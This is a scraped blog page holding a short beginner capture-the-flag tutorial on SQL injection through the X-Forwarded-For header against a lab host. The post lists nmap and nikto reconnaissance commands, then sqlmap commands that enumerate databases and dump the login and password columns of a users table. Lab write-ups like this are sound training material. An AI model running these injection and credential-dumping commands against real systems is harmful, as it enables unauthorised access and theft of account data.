6-3 CTF Capture the Flag Getting Started Tutorial--SQL Injection-X-Forwarded-For Header - Code World

6-3 CTF Capture the Flag Getting Started Tutorial--SQL Injection-X-Forwarded-For Header

Others 2020-10-03 17:52:46 views: null

1. Information detection

#扫描主机服务信息以及服务版本
nmap -sV 192.168.2.118
#快速扫描主机全部信息
nmap -T4 -A -v 192.168.2.118
#探测敏感信息
nikto -host http://192.168.2.118

2. Vulnerability scanning

#Because AVWS13 was not successfully installed before, so the screenshot
AVWS was not run

3. Vulnerability exploitation

#查看数据库信息
sqlmap -u http://192.168.2.118 --headers="X-Forwarded-For:*" --dbs --batch
#查看数据库中的表信息
sqlmap -u http://192.168.2.118 --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch
#查看表中的字段信息
sqlmap -u http://192.168.2.118 --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch
#查看字段值
sqlmap -u http://192.168.2.118 --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C "login,password" --dump --batch

Guess you like

Origin blog.csdn.net/m0_46622606/article/details/105420480

6-3 CTF Capture the Flag Getting Started Tutorial--SQL Injection-X-Forwarded-For Header

6-4CTF Capture the Flag Getting Started Tutorial--SSI Injection

6-7CTF Capture the Flag Getting Started Tutorial--Path Traversal (Elevate Root Privileges)

6-2 CTF Capture the Flag introductory tutorial-SQL injection POST parameters-injection of HTTP messages

ctf game_ctf capture the flag

Capture the Flag CTF-8 shooting range

Getting started with SQL injection

Getting Started tutorial series --- ENVI 2.2 image editing header files

Vue3 Getting Started Notes - Implementing Public Header Styles

The correct posture for getting started with the latest CTF in 2023

Getting started with CTF Reverse (1) Environment installation

Detailed explanation of SQL injection with defense - Getting Started

Getting started OrCAD capture Day (1)

es6 Getting Started Tutorial

ES6 Getting Started Tutorial

javacc tutorial 6 Getting started with jjtree

WebCollector 2.x Getting Started Tutorial

A minimalist tutorial for getting started with Qt (3)

Android Getting Started Tutorial | Getting Started with RecyclerView

i Spring Proving Ground game Capture the Flag CTF (second quarter) WEB calculate, calculate2

i Spring Proving Ground game Capture the Flag CTF (the third quarter) RE integer column

Network Security Competition CTF Capture the Flag-Attack - Explanation of Attack and Defense of Windows Target Machine Vulnerabilities

[Zero-based essential] CTF capture the flag competition learning resources arrangement

A collection of basic tools in the six major directions of Capture the Flag CTF (MISC, WEB, Crypto, Reverse, Pwn, Mobile)

MVC Getting Started Tutorial

ExtJs Getting Started Tutorial

less the Getting Started tutorial

Scrapy Getting Started Tutorial

Delphi Getting Started Tutorial

Metasploit Getting Started Tutorial

Recommended

Ranking

ElasticSearch-- data modeling best practices

Permission Maintenance - Shadow User Backdoor

Refactor the code using MVP mode

Quantitative investment-fundamental model-PVC multi-factor model

Spark Big Data Processing Lecture Notes 3.2 Mastering RDD Operators

Blazor page components (2)

Erlernen von Kenntnissen zur Android-Entwicklung – Kodierung, Verschlüsselung, Hash, Serialisierung und Zeichensätze

About Qi high in JAVA study notes SORM summary detailed personal explanation

Will you calculate the accuracy of the rope displacement sensor in the measurement?

OPENJTAG debugging learning (3): debugging using the gdb command line

Daily

More

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)

2024-04-23(30)

2024-04-22(5)